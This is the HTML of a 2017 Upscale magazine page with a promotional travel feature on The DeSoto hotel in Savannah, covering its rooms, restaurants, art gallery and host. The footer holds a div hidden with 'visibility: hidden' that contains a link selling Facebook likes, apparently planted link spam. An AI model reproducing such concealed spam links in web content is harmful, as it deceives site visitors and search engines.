																									<li class="pull-left"><a href="http://upscalemagazine.com/upscale-interview-hbo-insecures-actress-dominique-perry-tiffany-black/" title="">Upscale Interview with HBO Insecure&#8217;s Actress Dominique Perry with Tiffany Black </a><span>October 19, 2017</span></li>
																									<li class="pull-left"><a href="http://upscalemagazine.com/ragtrade-atlanta-2017-fashion-week-recap-presented-lincoln-motor-company/" title="">RAGTRADE ATLANTA 2017 Fashion Week Recap Presented by Licoln Motor Company </a><span>October 17, 2017</span></li>
																									<li class="pull-left"><a href="http://upscalemagazine.com/black-girls-celebrated-fabulously-international-day-girl/" title="">Black Girls Celebrated Fabulously On International Day Of The Girl </a><span>October 11, 2017</span></li>
																									<li class="pull-left"><a href="http://upscalemagazine.com/upscale-partners-louis-carr-dirty-little-secrets-men-edition-conference-designed-men-held-chicago/" title="">Upscale Partners With Louis Carr for &#8220;Dirty Little Secrets: Men Only Edition Conference Designed For Men&#8221; To Be Held In Chicago </a><span>October 9, 2017</span></li>
																									<li class="pull-left"><a href="http://upscalemagazine.com/dove-apologizes-ad-missed-mark-representing-black-women/" title="">Dove apologizes for ad: We &#8216;missed the mark&#8217; representing black women </a><span>October 9, 2017</span></li>
																							</ul>
																			</div>
								</div>
								
							</div>
						</div>
					</div>
				</div>
			</div>
			
			<!-- ticker news ends -->
			</div>
    
    </div>
       
    <div class="full_100">
  	<div class="space30"></div>
    	<!-- BREADCUMB -->
		 <!-- BREADCUMB -->
<div class="wa-flying-top">
	<div class="wa-breadcumb-container">
				<div class="col-md-12">
                <div class="bread_boxed">
                	<div class="container">
					<ul class="wa-ul-breadcumb"><li><a href="http://upscalemagazine.com">home</a></li><li><a href="http://upscalemagazine.com/category/travel/destinations/" rel="category tag">DESTINATIONS</a> </li><li> <a href="http://upscalemagazine.com/category/highlight/" rel="category tag">FEATURE HOMEPAGE</a> </li><li> <a href="http://upscalemagazine.com/category/travel/hotels/" rel="category tag">HOTELS</a> </li><li> <a href="http://upscalemagazine.com/category/travel/" rel="category tag">TRAVEL</a></ul>					<div class="clearfix"></div>
                    </div>
                   </div>
				</div>
	</div>
</div>
<!-- BREADCUMB ENDS -->
		<!-- BREADCUMB ENDS -->
	     
        <div class="full_box boxed">
    <div class="space30"></div>
	
	<div class="content_section">
	
		
		<!-- blog -->
		<div class="container">
			<div class="row">
				<div class="col-md-8">
					<div class="row">
						<div class="col-md-12">
														<!-- recent post -->
							<div>
																	<article  id="post-9316" class="mypost clearfix post-9316 post type-post status-publish format-standard has-post-thumbnail hentry category-destinations category-highlight category-hotels category-travel tag-desoto-by-sotherly tag-hotel tag-upscale-travel" itemscope itemtype="http://schema.org/Article">
	<header>
		<div class="entry-media">
	<div class="entry-image">
		<img src="https://i0.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/state-suite-bedroom-small.jpg?resize=762%2C426" alt="" />
	</div>
</div>
		<div class="wa-post-header">
			<div class="wa-breadcrumb">
				<h1 class="entry-title" itemprop="name"><a href="http://upscalemagazine.com/prestigious-elegant-regal-welcome-desoto-sotherly/" title="">Prestigious. Elegant. Regal. Welcome to The DeSoto by Sotherly</a></h1>
				<div class="entry-meta">
					<span class="entry-date updated"><i class="fa fa-calendar-o"></i><time itemprop="datePublished" datetime="2017-10-11 09:28:15">October 11, 2017</time></span>
					<span class="vcard"> <a class="url fn n" href="http://upscalemagazine.com/author/leslieroyal/" title=""><i class="fa fa-user"></i><span itemprop="author">Leslie E Royal</span></a></span>
									</div>
			</div>
		</div>
	</header>
    <!-- SHARE -->
							<div class="wa-big-element">
	<div class="wa-single-share">
		<div class="wa-social-sharing">SHARE THIS ARTICLE : </div>
		<div class="wa-social-sharing">
			<div id="fb-root"></div>
			<script>(function(d, s, id) {
			  var js, fjs = d.getElementsByTagName(s)[0];
			  if (d.getElementById(id)) return;
			  js = d.createElement(s); js.id = id;
			  js.src = "//connect.facebook.net/en_US/all.js#xfbml=1";
			  fjs.parentNode.insertBefore(js, fjs);
			}(document, 'script', 'facebook-jssdk'));</script>
			<div class="fb-share-button" data-href="" data-type="button_count"></div>
		</div>
		
			
		<div class="wa-social-sharing">
			<!-- Place this tag where you want the share button to render. -->
			<div class="g-plus" data-action="share" data-annotation="bubble"></div>

			<!-- Place this tag after the last share tag. -->
			<script type="text/javascript">
			  (function() {
				var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
				po.src = 'https://apis.google.com/js/platform.js';
				var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
			  })();
			</script>
		</div>
		
		<div class="wa-social-sharing">
						<a href="http://www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fupscalemagazine.com%2Fprestigious-elegant-regal-welcome-desoto-sotherly%2F&amp;description=Prestigious.+Elegant.+Regal.+Welcome+to+The+DeSoto+by+Sotherly" data-pin-do="buttonPin" data-pin-config="beside"><img src="https://i0.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/state-suite-bedroom-small.jpg?fit=762%2C426" alt="" /></a>
			<!-- Please call pinit.js only once per page -->
			<script type="text/javascript" async src="//assets.pinterest.com/js/pinit.js"></script>
		</div>
		
		<div class="wa-social-sharing">
			<a href="https://twitter.com/share" class="twitter-share-button" data-url="" data-lang="en">Tweet</a>
			<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
		</div>
		
		<div class="clearfix"></div>
	</div>
</div> 
							<!-- SHARE ENDS -->
	<div class="entry-content">
		<div class="wa-post-detail">
			<div itemprop="articleBody">
			<p>Originally opened in 1890, this celebrated, internationally renowned locale, boasting wonderful panoramic views of Savannah’s unrivaled skyline, is sited in the heart of the historic district. Thinking about an Elegant Girl&#8217;s Only Weekend, Romantic Escape, Cool Guys Getaway, Company Retreat or even a Solo Excursion? The Desoto is the perfect, palatial place to be.</p>
<p><a href="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg"><img data-attachment-id="9338" data-permalink="http://upscalemagazine.com/prestigious-elegant-regal-welcome-desoto-sotherly/hilton-desoto-savannah-king-1-of-17/" data-orig-file="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg?fit=4538%2C3255" data-orig-size="4538,3255" data-comments-opened="0" data-image-meta="{&quot;aperture&quot;:&quot;7.1&quot;,&quot;credit&quot;:&quot;David Robinson&quot;,&quot;camera&quot;:&quot;Canon EOS 5D Mark II&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1455836582&quot;,&quot;copyright&quot;:&quot;David Robinson Photography&quot;,&quot;focal_length&quot;:&quot;24&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Hilton DeSoto Savannah King (1 of 17)" data-image-description="" data-medium-file="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg?resize=270%2C170" data-large-file="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg?resize=370%2C240" class="aligncenter wp-image-9338" src="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg?resize=800%2C574" alt="" srcset="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg?w=4538 4538w, https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg?resize=768%2C551 768w, https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg?w=2000 2000w, https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/10/Hilton-DeSoto-Savannah-King-1-of-17.jpg?w=3000 3000w" sizes="(max-width: 800px) 100vw, 800px" data-recalc-dims="1" /></a></p>
<h2><strong>Well-Appointed Rooms and Regal Suites </strong></h2>
<p>Each room features luxurious cotton bedding, allowing guests to drift off into a peaceful sleep, hardwood floors, marble bathrooms, upholstered headboards, ergonomic work desk and chairs and complimentary cookies.  When making your reservations, consider a corner king guestroom or suite.  You are sure to have a room with a great view as well as a microwave and refrigerator.</p>
<h2><strong>Enjoy Mealtimes on the Veranda of Edgar’s Proof &amp; Provision </strong></h2>
<p>Delight in their contemporary, tantalizing twist to Southern cuisine as you lounge on the terrace and soak in the scenic view. Taste the 13<sup>th</sup> Colony Chicken Pate, BLT Salad, Hernando’s Manwich, Smoked Turkey Avocado Club or Goddess Wrap. Of course, there are all types of libations to complement your meal.</p>
<h2><strong>In-Room Dining and Terrace Pools Are All the Rage</strong></h2>
<p>If you’re not quite ready to leave your luxurious room, no worries.  Continue your in-room experience. Simply order room service. For breakfast, try the Not Yo&#8217; Mama&#8217;s Chicken Biscuit, Desoto Hash, Liberty Street Benedict, Georgia Pancakes, Fisherman’s Breakfast or the Farmer&#8217;s Market Omelet. When you do venture out, discover the pool terrace featuring fountains, fire pits and a cabana bar specializing in hand-crafted cocktails.</p>
<h2><strong>On The Go with Buffalo Bayou</strong></h2>
<p>Grab some gourmet coffee and light fare from Buffalo Bayou. Opening bright and early in the morning, just drop by and get various muffins, cold drinks and hot beverages. Sample southern sandwiches like pimento cheese &amp; bacon biscuits or turkey &amp; garden tomato clubs.</p>
<h2><strong>In The 1540 Room</strong></h2>
<p>Oh Yes! Just make your reservations and allow Executive Chef Kyle Jacovino and the restaurant&#8217;s Culinary Team to do the rest! They are sure to pleasantly surprise you with their tantalizing cuisine as you dine in the elegance of the 1540 Room. Writer suggestions are the Painted Hills Braised Short Rib, Whole Roasted Fish, Soft Coddled Grassroots Farm Egg and Torta De Santiago. Ask Chef Kyle about exceptional wine pairings and the expresso martini.</p>
<h2><strong>SCAD Comes to The Desoto</strong></h2>
<p>Internationally renowned Savannah College of Art and Design students and faculty created priceless masterpieces for the hotel. The school and hotel partnered to create a beautiful art gallery.  The hotel lobby hosts rotating exhibits, hanging sculpture and permanent pieces.  Artists spotlighted include Tom Francis, Lauren Clay and Just Ward. This is really a special treat for art aficionados.</p>
<h2><strong>Meet the Charismatic Kolin</strong></h2>
<p>Kolin Podell, your sensational Sotherly host, will ensure that your experience is one to remember! Just let him know about your interest in the sights and sounds of the city. And when you have a moment, just sit, sip and chat with him about the history of the beautiful city of Savannah and The Desoto. He is a wealth of knowledge and will make the history of this picturesque locale come alive for you.</p>
<h2><strong>Book Your Spectacular Getaway Today</strong></h2>
<p>Click on this link to explore the delightful Bed &amp; Breakfast Package, your much needed Instant Getaway Package, an intriguing Park, Sip &amp; Stroll Package and the mystique of the <a href="http://www.thedesotosavannah.com/hotel-stay-packages">Ghosts &amp; Grits Package</a>. Since a picture is worth a thousand words, <a href="https://www.facebook.com/LesliesLaneFREEStuff/?ref=br_rs">click here</a> to view the photo collages of the writer’s stay at <a href="https://www.facebook.com/LesliesLaneFREEStuff/?ref=br_rs">The DeSoto Savannah</a>.</p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-9316" class="share-twitter sd-button share-icon no-text" href="http://upscalemagazine.com/prestigious-elegant-regal-welcome-desoto-sotherly/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-9316" class="share-facebook sd-button share-icon no-text" href="http://upscalemagazine.com/prestigious-elegant-regal-welcome-desoto-sotherly/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-9316" class="share-google-plus-1 sd-button share-icon no-text" href="http://upscalemagazine.com/prestigious-elegant-regal-welcome-desoto-sotherly/?share=google-plus-1" target="_blank" title="Click to share on Google+"><span></span><span class="sharing-screen-reader-text">Click to share on Google+ (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div>			</div>
					</div>
	</div>
	<footer class="entry-footer">
		<!-- TAGS -->
				<div class="post-tags clearfix">
			<div itemprop="genre">
				<i class="fa fa-tag"></i>
			<a itemprop="keywords"  href="http://upscalemagazine.com/tag/desoto-by-sotherly/" title="View all posts in DeSoto by Sotherly" rel="category">DeSoto by Sotherly</a><a itemprop="keywords"  href="http://upscalemagazine.com/tag/hotel/" title="View all posts in hotel" rel="category">hotel</a><a itemprop="keywords"  href="http://upscalemagazine.com/tag/upscale-travel/" title="View all posts in upscale travel" rel="category">upscale travel</a>			</div>
		</div>
				<!-- TAGS ENDS -->
	</footer>
</article>																
								
							</div>
							<!-- recent post ends -->
							
							
							
							<!-- AUTHOR -->
							<div class="wa-big-element">
	<div class="row">
		<div class="col-md-12">
			<!-- 1 -->
				<h2 class="wa-single-title">ABOUT THE AUTHOR</h2>
				<div class="wa-author-info">
					<div class="wa-author-pic pull-left">
					<img src="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/08/IMG_2427.jpg?fit=62%2C82" width="62" height="82" alt="Leslie E Royal" class="avatar avatar-82 wp-user-avatar wp-user-avatar-82 alignnone photo" />					</div>
					<div class="wa-author-summary pull-left">
						<div class="wa-author-name">
							Leslie E Royal						</div>
						<div>
							<a href="http://www.leslieslane.com" title="" class="fa fa-globe"></a><a href="http://www.twitter.com/LesliesLane" title="" class="fa fa-twitter"></a>						</div>
					</div>
					<div class="clearfix">
					</div>
				</div>
				<div class="wa-tab-container">
					<ul class="wa-ul-tabs wa-ul-tabs-author">
						<li><a href="#id_tabs_about_me" title="">ABOUT ME</a></li>
						<li><a href="#id_tabs_other_articles" title="">OTHER ARTICLES</a></li>
						
					</ul>
					<div class="clearfix"></div>
					<div class="wa-tab-top"></div>
					<div class="wa-tab-list">
						<!-- popular start -->
						<div id="id_tabs_about_me" class="wa-tab-item wa-tab-item-author">
							<div>
								Leslie E. Royal is an international freelance writer, product review expert, social media influencer and global travel journalist. Her articles have appeared in numerous publications including: Upscale, Upscalemagazine.com, ESSENCE, ESSENCE.com, Black Enterprise, BlackEnterprise.com, FORTUNE.com and The Wall Street Journal.  She is the creator of the Leslie’s Lane consumer information blog and author of two books: How to Write and Self-Publish Your Book for FREE with Amazon’s CreateSpace (Amazon $9.95) and Leslie’s Lane The Book! Your One Stop Internet Resource Guide to Links for Jobs, Inspiration, Discounts, FREE Stuff, Scholarships, Travel and More! (Amazon $14.95). Follow her on social media at @LesliesLane.							</div>
						</div>
						<!-- comments -->
						<div id="id_tabs_other_articles"  class="wa-tab-item wa-tab-item-author">
							<div class="wa-container">
							<div class="wa-row clearfix">								<div class="wa-one-half">
									<div class="wa-small-post clearfix">
																				<div class="wa-media wa-post-media pull-left">
											<div class="wa-media-link">
									<a title="" href="http://upscalemagazine.com/the-power-of-the-pair-forming-friendships-and-partnerships-that-last-a-lifetime/"><i class="fa fa-search-plus"></i></a>
								</div>											<a href="http://upscalemagazine.com/the-power-of-the-pair-forming-friendships-and-partnerships-that-last-a-lifetime/" title=""><img src="https://i1.wp.com/upscalemagazine.com/wp-content/uploads/2017/08/power-of-the-pair.jpg?resize=100%2C70" alt="" /></a>
										</div>
																				<div class="wa-post-header">
																						<h3><a href="http://upscalemagazine.com/the-power-of-the-pair-forming-friendships-and-partnerships-that-last-a-lifetime/" title="">The Power of the Pair: Forming Friendships and Partnerships That Last a Lifetime</a></h3>
											<div class="entry-meta">
												<span><i class="fa fa-calendar-o"></i>August 6, 2017</span>
												<a href="http://upscalemagazine.com/author/leslieroyal/" title=""><span><i class="fa fa-user"></i>Leslie E Royal</span></a>
												<a href="http://upscalemagazine.com/the-power-of-the-pair-forming-friendships-and-partnerships-that-last-a-lifetime/#respond" title=""><span><i class="fa fa-comments"></i>0</span></a>
											</div>
										</div>
									</div>
								</div>
															<div class="wa-one-half">
									<div class="wa-small-post clearfix">
																				<div class="wa-media wa-post-media pull-left">
											<div class="wa-media-link">
									<a title="" href="http://upscalemagazine.com/take-wildly-affordable-trip-birthplace-independence/"><i class="fa fa-search-plus"></i></a>
								</div>											<a href="http://upscalemagazine.com/take-wildly-affordable-trip-birthplace-independence/" title=""><img src="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/09/philadelphia.jpg?resize=100%2C70" alt="" /></a>
										</div>
																				<div class="wa-post-header">
																						<h3><a href="http://upscalemagazine.com/take-wildly-affordable-trip-birthplace-independence/" title="">Take a Wildly Affordable Trip to the Birthplace of Independence!</a></h3>
											<div class="entry-meta">
												<span><i class="fa fa-calendar-o"></i>September 16, 2017</span>
												<a href="http://upscalemagazine.com/author/leslieroyal/" title=""><span><i class="fa fa-user"></i>Leslie E Royal</span></a>
												<a href="http://upscalemagazine.com/take-wildly-affordable-trip-birthplace-independence/#respond" title=""><span><i class="fa fa-comments"></i>0</span></a>
											</div>
										</div>
									</div>
								</div>
							</div><div class="wa-row clearfix">								<div class="wa-one-half">
									<div class="wa-small-post clearfix">
																				<div class="wa-media wa-post-media pull-left">
											<div class="wa-media-link">
									<a title="" href="http://upscalemagazine.com/great-spur-moment-beach-vacay-labor-day/"><i class="fa fa-search-plus"></i></a>
								</div>											<a href="http://upscalemagazine.com/great-spur-moment-beach-vacay-labor-day/" title=""><img src="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/08/orange-beach-alabama.jpg?resize=100%2C70" alt="" /></a>
										</div>
																				<div class="wa-post-header">
																						<h3><a href="http://upscalemagazine.com/great-spur-moment-beach-vacay-labor-day/" title="">A Great Spur-of-the-Moment Beach Vacay for Labor Day</a></h3>
											<div class="entry-meta">
												<span><i class="fa fa-calendar-o"></i>August 30, 2017</span>
												<a href="http://upscalemagazine.com/author/leslieroyal/" title=""><span><i class="fa fa-user"></i>Leslie E Royal</span></a>
												<a href="http://upscalemagazine.com/great-spur-moment-beach-vacay-labor-day/#comments" title=""><span><i class="fa fa-comments"></i>1</span></a>
											</div>
										</div>
									</div>
								</div>
															<div class="wa-one-half">
									<div class="wa-small-post clearfix">
																				<div class="wa-media wa-post-media pull-left">
											<div class="wa-media-link">
									<a title="" href="http://upscalemagazine.com/6-exclusive-resorts-and-luxury-locales-that-are-well-worth-the-visit/"><i class="fa fa-search-plus"></i></a>
								</div>											<a href="http://upscalemagazine.com/6-exclusive-resorts-and-luxury-locales-that-are-well-worth-the-visit/" title=""><img src="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2017/09/Ficus-Suite-Balcony-1.jpg?resize=100%2C70" alt="" /></a>
										</div>
																				<div class="wa-post-header">
																						<h3><a href="http://upscalemagazine.com/6-exclusive-resorts-and-luxury-locales-that-are-well-worth-the-visit/" title="">6 Exclusive Resorts and Luxury Locales That Are Well Worth the Visit</a></h3>
											<div class="entry-meta">
												<span><i class="fa fa-calendar-o"></i>September 15, 2017</span>
												<a href="http://upscalemagazine.com/author/leslieroyal/" title=""><span><i class="fa fa-user"></i>Leslie E Royal</span></a>
												<a href="http://upscalemagazine.com/6-exclusive-resorts-and-luxury-locales-that-are-well-worth-the-visit/#respond" title=""><span><i class="fa fa-comments"></i>0</span></a>
											</div>
										</div>
									</div>
								</div>
							</div>							</div>
							<!-- popular ends -->
						</div>
						<!-- comments ends -->
						
					</div>
				</div>
			
			<!-- 1 ends -->
		</div>
	</div>
</div> 
							<!-- AUTHOR ENDS -->
							
							<!-- PREV NEXT -->
							<div class="wa-big-element">
	<div class="wa-post-prev-next">
		<div class="row">
			<div class="col-md-12">
				<div class="row">
					<div class="col-md-6 col-sm-6 col-xs-6">
																		<a class="post-previous" href="http://upscalemagazine.com/single-mom-32-bank-balance-creates-international-hair-care-brand/">
							<span>PREVIOUS</span>
							<h3>
								Single Mom With A $32 Bank Balance Creates International Hair Care Brand							</h3>
						</a>
						<div class="clearfix"></div>
											</div>
					<div class="col-md-6  col-sm-6 col-xs-6">

																		<a class="post-next" href="http://upscalemagazine.com/black-girls-celebrated-fabulously-international-day-girl/">
							<span>NEXT</span>
							
							<h3>
								
								Black Girls Celebrated Fabulously On International Day Of The Girl								
							</h3>
						</a>
						<div class="clearfix"></div>
											</div>
				</div>
			</div>
			<div class="clearfix"></div>
		</div>
	</div>
</div> 
							<!-- PREV NEXT ENDS -->
							
							
							<!-- RELATED POST -->
							<div class="wa-big-element">
	<div class="row">
		<div class="col-md-12">
			<div>
				<h2 class="wa-single-title">RELATED POST</h2>
			</div>
		<div class="row">						<div class="col-md-6  col-sm-6">
							<div class="wa-small-post clearfix">
																<div class="wa-media wa-post-media pull-left">
									<div class="wa-media-link">
									<a title="" href="http://upscalemagazine.com/salmon-salmon-salmon-the-fresh-enticing-flavors-of-the-sea-are-calling/"><i class="fa fa-search-plus"></i></a>
								</div>									<a href="http://upscalemagazine.com/salmon-salmon-salmon-the-fresh-enticing-flavors-of-the-sea-are-calling/" title=""><img src="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2015/07/FeatureImage_salmon1.jpg?resize=100%2C70" alt="" /></a>
								</div>
																<div class="wa-post-header">
																		<h3><a href="http://upscalemagazine.com/salmon-salmon-salmon-the-fresh-enticing-flavors-of-the-sea-are-calling/" title="">SALMON! THE FRESH ENTICING FLAVORS OF THE SEA ARE CALLING</a></h3>
									<div class="entry-meta">
										<span><i class="fa fa-calendar-o"></i>July 30, 2015</span>
										<a href="http://upscalemagazine.com/author/admin/" title=""><span><i class="fa fa-user"></i>Upscale</span></a>
																			</div>
								</div>
							</div>
						</div>
								<div class="col-md-6  col-sm-6">
							<div class="wa-small-post clearfix">
																<div class="wa-media wa-post-media pull-left">
									<div class="wa-media-link">
									<a title="" href="http://upscalemagazine.com/check-out-these-tips-and-deals-for-couples-families-and-girlfriend-getaway-planning-on-the-fly/"><i class="fa fa-search-plus"></i></a>
								</div>									<a href="http://upscalemagazine.com/check-out-these-tips-and-deals-for-couples-families-and-girlfriend-getaway-planning-on-the-fly/" title=""><img src="https://i2.wp.com/upscalemagazine.com/wp-content/uploads/2015/06/FeatureImage_vacationPlanning1.jpg?resize=100%2C70" alt="" /></a>
								</div>
																<div class="wa-post-header">
																		<h3><a href="http://upscalemagazine.com/check-out-these-tips-and-deals-for-couples-families-and-girlfriend-getaway-planning-on-the-fly/" title="">TIPS AND DEALS FOR FAMILIES, COUPLES AND GIRLFRIEND GETAWAY PLANNING</a></h3>
									<div class="entry-meta">
										<span><i class="fa fa-calendar-o"></i>June 1, 2015</span>
										<a href="http://upscalemagazine.com/author/admin/" title=""><span><i class="fa fa-user"></i>Upscale</span></a>
																			</div>
								</div>
							</div>
						</div>
		</div><div class="row">						<div class="col-md-6  col-sm-6">
							<div class="wa-small-post clearfix">
																<div class="wa-media wa-post-media pull-left">
									<div class="wa-media-link">
									<a title="" href="http://upscalemagazine.com/beauty-uncovered-flawless-fusion-ultra-longwear-foundation/"><i class="fa fa-search-plus"></i></a>
								</div>									<a href="http://upscalemagazine.com/beauty-uncovered-flawless-fusion-ultra-longwear-foundation/" title=""><img src="https://i0.wp.com/upscalemagazine.com/wp-content/uploads/2017/09/foundation-bab-2.jpg?resize=100%2C70" alt="" /></a>
								</div>
																<div class="wa-post-header">
																		<h3><a href="http://upscalemagazine.com/beauty-uncovered-flawless-fusion-ultra-longwear-foundation/" title="">Beauty Uncovered: Flawless Fusion Ultra-Longwear Foundation</a></h3>
									<div class="entry-meta">
										<span><i class="fa fa-calendar-o"></i>September 24, 2017</span>
										<a href="http://upscalemagazine.com/author/bestiesandbrunch/" title=""><span><i class="fa fa-user"></i>Besties And Brunch</span></a>
																			</div>
								</div>
							</div>
						</div>
								<div class="col-md-6  col-sm-6">
							<div class="wa-small-post clearfix">
																<div class="wa-media wa-post-media pull-left">
									<div class="wa-media-link">
									<a title="" href="http://upscalemagazine.com/winter-boss-styles-that-wont-rock-your-budget/"><i class="fa fa-search-plus"></i></a>
								</div>									<a href="http://upscalemagazine.com/winter-boss-styles-that-wont-rock-your-budget/" title=""><img src="https://i0.wp.com/upscalemagazine.com/wp-content/uploads/2016/12/cwhite5a.jpg?resize=100%2C70" alt="" /></a>
								</div>
																<div class="wa-post-header">
																		<h3><a href="http://upscalemagazine.com/winter-boss-styles-that-wont-rock-your-budget/" title="">Winter Boss Styles That Won’t Rock Your Budget</a></h3>
									<div class="entry-meta">
										<span><i class="fa fa-calendar-o"></i>December 16, 2016</span>
										<a href="http://upscalemagazine.com/author/mariellen/" title=""><span><i class="fa fa-user"></i>Upscale</span></a>
																			</div>
								</div>
							</div>
						</div>
		</div>				
		</div>
		
	</div>
</div> 
							<!-- RELATED POST ENDS -->
							
							<!-- comments -->
							<div class="row">
								<div class="col-md-12">
								<!-- comment start -->
																
								<!-- comment ends -->
								</div>
							</div>
							<!-- comments ends -->
						</div>
					</div>
					
				</div>
				
				<!-- sidebar -->
				<div class="col-md-4">
					<div class="sidebar">
						<!-- start SIDEBAR WIDGET -->
						<div id="search-2" class="wa-widget wa-widget-sidebar widget_search"><div class="wa-widget-title"><h2 class="page-title-small"><span>SEARCH upscalemagazine.com</span></h2></div><form role="search" method="get" class="searchform" action="http://upscalemagazine.com/">	
	<div class="clearfix">		
		<input type="text" placeholder="Search..." name="s" class="s">		
		<button class="searchsubmit" type="submit"><i class="fa fa-search"></i></button>	
	</div>
</form></div>			<!-- 1 -->
			<div class="wa-widget">
				<div>
					<a href="http://upscalemagazine.com/subscribe/" title=""><img src="http://upscalemagazine.com/wp-content/uploads/2016/11/Banner-nov-dec2016.png?x41646" alt="" /></a>
				</div>						
			</div>
			<!-- 1 ends -->
			<!-- 1 -->
			<div class="wa-widget">
				<div>
					<a href="http://www.gpb.org/seat-at-the-table" title=""><img src="http://upscalemagazine.com/wp-content/uploads/2017/06/Uptown-Magazine-Banner-Ad.png?x41646" alt="" /></a>
				</div>						
			</div>
			<!-- 1 ends -->
			<!-- 1 -->
			<div class="wa-widget">
				<div>
					<a href="http://upscalemagazine.com/subscribe/" title=""><img src="http://upscalemagazine.com/wp-content/uploads/2017/09/LethalWeaponS1Upscl300x250-2.jpg?x41646" alt="" /></a>
				</div>						
			</div>
			<!-- 1 ends -->
<div id="text-14" class="wa-widget wa-widget-sidebar widget_text">			<div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Upscale Side Banner -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-8823053779344984"
     data-ad-slot="4020410154"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
		</div>						<!-- end SIDEBAR WIDGET -->
						
					</div>
						
				</div>
				<!-- sidebar ends --> 
			</div>
		</div>
		
	
	</div>
	<!-- content section -->
	
	
	



<div align="center" class="footadd">
<div id="text-13" class="wa-widget wa-widget-sidebar widget_text">			<div class="textwidget"><a href="http://www.upscalemagazine.com/subscribe//">

<img src="https://i1.wp.com/upscalemagazine.com/wp-content/uploads/2016/02/content-bot-add_taraji21.jpg" data-recalc-dims="1" />

</a></div>
		</div>

</div>
</div></div>
	<div class="footer_section">

		<!-- footer -->

		<div id="footer" class="full_100">

			<div class="container">

				<div class="row">

					<div class="col-md-4">

                    <div class="col-md-12">

						<!-- start SIDEBAR WIDGET -->

						<div id="text-2" class="wa-widget wa-widget-footer widget_text">			<div class="textwidget">Upscale is the ultimate lifestyle magazine addressing the needs of stylish, informed and progressive African- Americans. On our pages, you will find the latest news in entertainment, beauty, fashion, health, fitness and travel. It is more than a magazine, it is a lifestyle. It is a place to be empowered and inspired to live loudly, learn smartly and embrace life with passion.

<div style="visibility: hidden">Get the best likes, followers,<a href="http://www.likesbazar.com/buy-facebook-likes
">http://www.likesbazar.com/buy-facebook-likes
</a>social media branding is important</div></div>
		</div>
						<!-- end SIDEBAR WIDGET -->

                        </div>

					</div>

					<div class="col-md-4">

                    <div class="col-md-12">

						<!-- start SIDEBAR WIDGET -->

						<div id="mc4wp_form_widget-2" class="wa-widget wa-widget-footer widget_mc4wp_form_widget"><div class="wa-widget-title"><h2 class="page-title-small"><span>Newsletter</span></h2></div><script type="text/javascript">(function() {
	if (!window.mc4wp) {
		window.mc4wp = {
			listeners: [],
			forms    : {
				on: function (event, callback) {
					window.mc4wp.listeners.push({
						event   : event,
						callback: callback
					});
				}
			}
		}
	}
})();
</script><!-- MailChimp for WordPress v4.1.9 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-6828 mc4wp-form-theme mc4wp-form-theme-dark" method="post" data-id="6828" data-name="Default sign-up form" ><div class="mc4wp-form-fields"><p>
    <input required="required" placeholder="Your email address" name="EMAIL" type="email">
</p>
<p>
<input placeholder="Your first name" name="FNAME" type="text">
</p>
<p>
<input placeholder="Your last name" name="LNAME" type="text">
<p>
	<input type="submit" value="Sign up" />
